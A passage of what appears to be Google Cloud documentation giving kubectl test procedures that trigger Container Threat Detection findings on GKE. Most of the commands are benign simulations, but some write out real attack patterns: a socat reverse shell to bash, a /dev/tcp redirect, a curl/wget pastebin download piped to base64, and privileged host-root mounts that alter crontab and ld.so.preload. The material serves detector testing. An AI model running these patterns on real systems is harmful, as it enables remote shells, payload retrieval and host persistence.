      tag="ktd-test-modified-malicious-binary-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
            {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
            "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
            "value": "arm64" } ]}}' \
          "$tag" -- sh -c \
          "echo -n '$eicar' > /etc/issue; chmod 700 /etc/issue; /etc/issue; sleep 10"

This test procedure creates an Execution: Modified Malicious Binary Executed finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

For noise reduction, when you first create a container, Container Threat Detection temporarily filters Execution: Modified Malicious Binary Executed findings. To see all Execution: Modified Malicious Binary Executed findings while a container is being set up, prefix your container name or Pod name with ktd-test, as in the example.

Execution: Modified Malicious Library Loaded

To trigger an Execution: Modified Malicious Library Loaded finding, modify an existing file in your container into a malicious library and load it. This example deploys the latest Ubuntu 24.04 image, overwrites the /etc/issue file with a simulated malicious library, and then loads it using mmap. Loading the existing file as a library is unexpected because its contents are now an EICAR test file, which is classified as malicious by threat intelligence.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Add the EICAR file and load it:

    • x86 node:

      tag="ktd-test-modified-malicious-library-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- sh -c "
            apt-get update && apt-get install -y gcc libc-dev --no-install-recommends > /dev/null 2>&1;
            echo -n '$eicar' > /etc/issue;
            cat << 'EOF' > /tmp/loader.c
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         if (fd == -1) return 1;
         struct stat sb;
         if (fstat(fd, &sb) == -1) return 1;
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         if (addr == MAP_FAILED) return 1;
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
      EOF
            gcc /tmp/loader.c -o /tmp/loader && /tmp/loader /etc/issue
            sleep 10"

    • ARM node:

      tag="ktd-test-modified-malicious-library-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
            {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
            "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
            "value": "arm64" } ]}}' \
          "$tag" -- sh -c "
            apt-get update && apt-get install -y gcc libc-dev --no-install-recommends > /dev/null 2>&1;
            echo -n '$eicar' > /etc/issue;
            cat << 'EOF' > /tmp/loader.c
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         if (fd == -1) return 1;
         struct stat sb;
         if (fstat(fd, &sb) == -1) return 1;
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         if (addr == MAP_FAILED) return 1;
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
      EOF
            gcc /tmp/loader.c -o /tmp/loader && /tmp/loader /etc/issue
            sleep 10"

This test procedure creates an Execution: Modified Malicious Library Loaded finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

For noise reduction, when you first create a container, Container Threat Detection temporarily filters Execution: Modified Malicious Library Loaded findings. To see all Execution: Modified Malicious Library Loaded findings while a container is being set up, prefix your container name or Pod name with ktd-test, as in the example.

Execution: Netcat Remote Code Execution In Container

To trigger an Execution: Netcat Remote Code Execution In Container event, a binary capable of network communication (like netcat itself, or a renamed copy of another utility) needs to be present and executed inside the container. This example deploys the latest Ubuntu 24.04 image as a base. It copies the /bin/ls binary and renames that copy to nc (a network utility). This renamed binary is then executed with arguments appropriate for network interaction. This activity is flagged as suspicious because it mimics the behavior often observed during actual remote code execution attempts within containerized environments.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Introduce a network communication tool binary like nc and execute it with appropriate arguments:

    • x86 node:

      tag="ktd-test-netcat-remote-code-exec-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/nc; /tmp/nc -e"

    • ARM node:

      tag="ktd-test-netcat-remote-code-exec-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
            {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
            "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
            "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/nc; /tmp/nc -e"

This test procedure creates an Execution: Netcat Remote Code Execution In Container finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Execution: Possible Arbitrary Command Execution through CUPS (CVE-2024-47177)

To trigger an Execution: Possible Arbitrary Command Execution through CUPS (CVE-2024-47177) finding, a shell process must be spawned by a process named foomatic-rip. This example uses the latest Ubuntu 24.04 image. It copies /bin/bash to /tmp/foomatic-rip and runs that renamed copy as the interpreter of a shell script, which in turn spawns a child shell command. This behavior is flagged as suspicious because it can indicate an attempt to execute arbitrary workloads on compromised systems.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Execute the command with appropriate arguments:

    • x86 node:

      tag="ktd-test-cups-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          'cp /bin/bash /tmp/foomatic-rip; echo "#!/tmp/foomatic-rip" >> /tmp/test.sh; echo "sh -c echo hello" >> /tmp/test.sh; chmod +x /tmp/test.sh; /tmp/test.sh; sleep 10'

    • ARM node:

      tag="ktd-test-cups-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
            {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
            "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
            "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          'cp /bin/bash /tmp/foomatic-rip; echo "#!/tmp/foomatic-rip" >> /tmp/test.sh; echo "sh -c echo hello" >> /tmp/test.sh; chmod +x /tmp/test.sh; /tmp/test.sh; sleep 10'

This test procedure creates an Execution: Possible Arbitrary Command Execution through CUPS (CVE-2024-47177) finding that you can view in Security Command Center and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Execution: Possible Remote Command Execution Detected

To trigger an Execution: Possible Remote Command Execution Detected (Preview) finding, the execution of a command or binary commonly associated with remote command execution must be observed within a container. This example uses the latest Ubuntu 24.04 image. It copies /bin/ls and renames the copy to touch (or another tool, such as find). This renamed binary is then executed with arguments appropriate for remote command execution. This behavior is flagged as suspicious because it can indicate an attempt to establish unauthorized remote access to or from the container.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Execute a binary like touch with appropriate arguments:

    • x86 node:

      tag="ktd-test-remote-cmd-exec-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/touch; echo \"Hello\" | /tmp/touch >& /dev/tcp/8.8.8.8/53"

    • ARM node:

      tag="ktd-test-remote-cmd-exec-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
            {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
            "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
            "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/touch; echo \"Hello\" | /tmp/touch >& /dev/tcp/8.8.8.8/53"

This test procedure creates an Execution: Possible Remote Command Execution Detected finding that you can view in Security Command Center and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Execution: Program Run with Disallowed HTTP Proxy Env

To trigger an Execution: Program Run with Disallowed HTTP Proxy Env finding, execute a program within a container with an HTTP proxy environment variable set to a disallowed value. This example uses the latest Ubuntu 24.04 image. The /bin/ls utility is copied and renamed to /tmp/curl. This renamed binary is then executed with a disallowed value set for an HTTP proxy environment variable (for example, HTTP_PROXY or http_proxy). The combination of program execution and the presence of a disallowed HTTP proxy environment variable is flagged as suspicious, as it suggests an attempt to communicate through an unauthorized proxy.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Introduce a network-capable binary, like curl, and execute it with a disallowed HTTP proxy environment variable:

    • x86 node:

      tag="ktd-test-program-with-http-proxy-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/curl; HTTP_PROXY=127.0.0.1:8080 /tmp/curl"

    • ARM node:

      tag="ktd-test-program-with-http-proxy-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
              {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/curl; HTTP_PROXY=127.0.0.1:8080 /tmp/curl"

This test procedure creates an Execution: Program Run with Disallowed HTTP Proxy Env finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Execution: Socat Reverse Shell Detected

To trigger an Execution: Socat Reverse Shell Detected finding, a process reverse shell connection must be established by the socat utility. This example uses the latest Ubuntu 24.04 image. The socat utility is installed and a local TCP listener is created and then bound to by the socat utility. The reverse shell created by socat is flagged as suspicious because it allows an attacker to run arbitrary workloads on the system.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Create a container and execute the socat utility:

    • x86 node:

      tag="ktd-test-socat-reverse-shell-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          "apt-get update && apt-get install socat -y && (socat UNIX-LISTEN:/tmp/shell.sock STDOUT &) && sleep 2 && timeout 5s socat UNIX-CONNECT:/tmp/shell.sock EXEC:/bin/bash,pty,stderr,setsid,sigint,sane || true"

    • ARM node:

      tag="ktd-test-socat-reverse-shell-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
              {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "apt-get update && apt-get install socat -y && (socat UNIX-LISTEN:/tmp/shell.sock STDOUT &) && sleep 2 && timeout 5s socat UNIX-CONNECT:/tmp/shell.sock EXEC:/bin/bash,pty,stderr,setsid,sigint,sane || true"

This test procedure creates an Execution: Socat Reverse Shell Detected finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Execution: Suspicious Cron Modification (Preview)

To trigger a Suspicious Cron Modification detection, modify the host's /etc/crontab file from a container. This example deploys the latest Ubuntu 24.04 image, mounting the host's root file system into the container. It then updates the crontab file.

This is a file monitoring detector and has specific GKE version requirements.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Execute a command to modify the host's /etc/crontab file.

    • x86 node:

      tag="ktd-test-cron-mod-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never --rm=true -ti --image ubuntu "$tag" \
          --overrides='{"apiVersion": "v1", "spec": {
              "containers":[{"command": ["sh", "-c", "/bin/echo >> /host/etc/crontab"],
              "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",
              "securityContext": {"privileged": true},
              "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",
              "readOnly": false}]}],
              "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}]}}'

    • ARM node:

      tag="ktd-test-cron-mod-arm-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never --rm=true -ti --image ubuntu "$tag" \
          --overrides='{"apiVersion": "v1", "spec": {
              "containers":[{"command": ["sh", "-c", "/bin/echo >> /host/etc/crontab"],
              "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",
              "securityContext": {"privileged": true},
              "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",
              "readOnly": false}]}],
              "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}],
              "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[{ "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" }] }}'

This test procedure triggers a Suspicious Cron Modification finding that you can view in Security Command Center and, if you have configured Logging for Container Threat Detection, in Cloud Logging. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center at the organization level.

Execution: Suspicious OpenSSL Shared Object Loaded

To trigger an Execution: Suspicious OpenSSL Shared Object Loaded finding, execute the openssl engine command with an argument that is a file that ends with the .so extension. This example uses the latest Ubuntu 24.04 image. The /bin/ls utility is copied and renamed to /tmp/openssl. This renamed binary is then executed with the engine and fake .so file arguments. The execution of openssl engine with a .so file is flagged as suspicious because it mimics the behavior of a shared object being loaded to execute malicious code.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Execute openssl engine with a fake shared object library argument:

    • x86 node:

      tag="ktd-test-suspicious-openssl-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/openssl; /tmp/openssl engine /tmp/fakelib.so"

    • ARM node:

      tag="ktd-test-suspicious-openssl-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
              {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/openssl; /tmp/openssl engine /tmp/fakelib.so"

This test procedure creates an Execution: Suspicious OpenSSL Shared Object Loaded finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Exfiltration: Launch Remote File Copy Tools In Container

To trigger an Exfiltration: Launch Remote File Copy Tools In Container finding, execute a common remote file copy tool within a container. This example uses the latest Ubuntu 24.04 image. The /bin/ls utility is copied and renamed to /tmp/rsync and then executed to retrieve a file from a remote, potentially malicious, source. The execution of such a tool with remote file retrieval arguments within a container is flagged as suspicious, as it could indicate an attempt to download and execute malicious code or exfiltrate data.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Introduce a remote file copy tool, like rsync, and execute it:

    • x86 node:

      tag="ktd-test-launch-remote-file-copy-tools-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/rsync; /tmp/rsync"

    • ARM node:

      tag="ktd-test-launch-remote-file-copy-tools-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
              {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/rsync; /tmp/rsync"

This test procedure creates an Exfiltration: Launch Remote File Copy Tools In Container finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Impact: Detect Malicious Cmdlines

To trigger an Impact: Detect Malicious Cmdlines (Preview) finding, the execution of a command line with known malicious patterns or arguments must be observed within a container. This example uses the latest Ubuntu 24.04 image. It involves copying the /bin/ls binary and renaming that copy to ipfs. The renamed binary is then executed. This behavior is flagged as suspicious because it can indicate an attempt to execute malicious code or bypass security controls.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Execute a binary like ipfs:

    • x86 node:

      tag="ktd-test-detect-malicious-cmdlines-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/ipfs; /tmp/ipfs"

    • ARM node:

      tag="ktd-test-detect-malicious-cmdlines-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
              {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/ipfs; /tmp/ipfs"

This test procedure creates an Impact: Detect Malicious Cmdlines finding that you can view in Security Command Center and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Impact: Remove Bulk Data From Disk

To trigger an Impact: Remove Bulk Data From Disk finding, place a binary capable of data deletion or overwriting in your container and execute it. This example uses the latest Ubuntu 24.04 image. It involves copying the /bin/ls binary and renaming that copy to shred (or a similar utility designed for secure file deletion). The renamed binary is then executed. This action is flagged as suspicious because it mimics the behavior often seen when attempts are made to remove large amounts of data from a disk within a containerized environment.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Introduce a file or data deletion binary like shred and execute it:

    • x86 node:

      tag="ktd-test-remove-bulk-data-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/shred; /tmp/shred"

    • ARM node:

      tag="ktd-test-remove-bulk-data-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
              {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/shred; /tmp/shred"

This test procedure creates an Impact: Remove Bulk Data From Disk finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Impact: Suspicious crypto mining activity using the Stratum Protocol

To trigger an Impact: Suspicious crypto mining activity using the Stratum Protocol finding, a binary needs to be executed within a container with arguments that resemble those used by crypto mining software communicating using the Stratum protocol. The example uses the latest Ubuntu 24.04 image. It copies /bin/ls and renames that copy to a mock binary that stands in for a crypto miner. This renamed binary is then executed with arguments that include stratum+tcp or similar Stratum protocol indicators. This activity is flagged as suspicious because it mimics the network communication patterns of crypto mining software within containerized environments.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Introduce a utility binary like curl and execute it with arguments that resemble those used by crypto mining software communicating using the Stratum protocol:

    • x86 node:

      tag="ktd-test-detect-crypto-using-stratum-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/curl; /tmp/curl --url=stratum+tcp"

    • ARM node:

      tag="ktd-test-detect-crypto-using-stratum-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
              {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/curl; /tmp/curl --url=stratum+tcp"

This test procedure creates an Impact: Suspicious crypto mining activity using the Stratum Protocol finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

You might also see an additional finding for the bash command that you run in this test. This behavior is normal, and you can ignore the additional finding.

Malicious Script Executed

To trigger a Malicious Script Executed finding, you can execute the script in the following procedure in your container.

The procedure deploys the latest Ubuntu 24.04 image, copies a script that appears malicious, and then executes it. To trigger a detection, a script must appear malicious to the detector.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Execute the following script in a new container.

    This inline Bourne shell script originated from a honeypot. However, it has been modified so that it does not execute the malicious binary, so running the script won't cause malicious activity in your container. The binary at the referenced URL may have been removed and attempting to follow the URL will result in a 404 error. This is expected. The attempt to download, decode, and execute a binary using an inline script is what triggers the detection.

    • x86 node:

      tag="ktd-test-malicious-script-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- sh -c \
          "(curl -fsSL https://pastebin.com/raw/KGwfArMR||wget -q -O - https://pastebin.com/raw/KGwfArMR)| base64 -d"

    • ARM node:

      tag="ktd-test-malicious-script-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
              {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" } ]}}' \
          "$tag" -- sh -c \
          "(curl -fsSL https://pastebin.com/raw/KGwfArMR||wget -q -O - https://pastebin.com/raw/KGwfArMR)| base64 -d"

This test procedure creates a Malicious Script Executed finding that you can view in Security Command Center and in Cloud Logging if you've configured logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Malicious URL Observed

To trigger a Malicious URL Observed finding, execute a binary and provide a malicious URL as an argument.

The following example deploys an Ubuntu 24.04 image and executes /bin/curl to access a sample malware URL from the Safe Browsing service.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Execute curl and provide a malicious URL as an argument:

    • x86 node:

      tag="ktd-test-malicious-url-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      url="https://testsafebrowsing.appspot.com/s/malware.html"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- sh -c "cp /bin/ls /tmp/curl; /tmp/curl $url 2> /dev/null || true"

    • ARM node:

      tag="ktd-test-malicious-url-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      url="https://testsafebrowsing.appspot.com/s/malware.html"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
              {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" } ]}}' \
          "$tag" -- sh -c "cp /bin/ls /tmp/curl; /tmp/curl $url 2> /dev/null || true"

This test procedure triggers a Malicious URL Observed finding that you can view in Security Command Center and, if you have configured Logging for Container Threat Detection, in Cloud Logging. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center at the organization level.

Persistence: Modify ld.so.preload (Preview)

To trigger a ld.so.preload modification detection, modify the host's /etc/ld.so.preload file. This example deploys the latest Ubuntu 24.04 image, mounting the host's root file system into the container, and then updates /etc/ld.so.preload.

This is a file monitoring detector and has specific GKE version requirements.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Execute a binary that modifies the host's /etc/ld.so.preload file.

    • x86 node:

      tag="ktd-test-ld-preload-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never --rm=true -ti --image ubuntu "$tag" \
          --overrides='{"apiVersion": "v1", "spec": {
              "containers":[{"command": ["/bin/touch", "/host/etc/ld.so.preload"],
              "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",
              "securityContext": {"privileged": true},
              "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",
              "readOnly": false}]}],
              "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}]}}'

    • ARM node:

      tag="ktd-test-ld-preload-arm-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never --rm=true -ti --image ubuntu "$tag" \
          --overrides='{"apiVersion": "v1", "spec": {
              "containers":[{"command": ["/bin/touch", "/host/etc/ld.so.preload"],
              "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",
              "securityContext": {"privileged": true},
              "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",
              "readOnly": false}]}],
              "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}],
              "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[{ "effect":
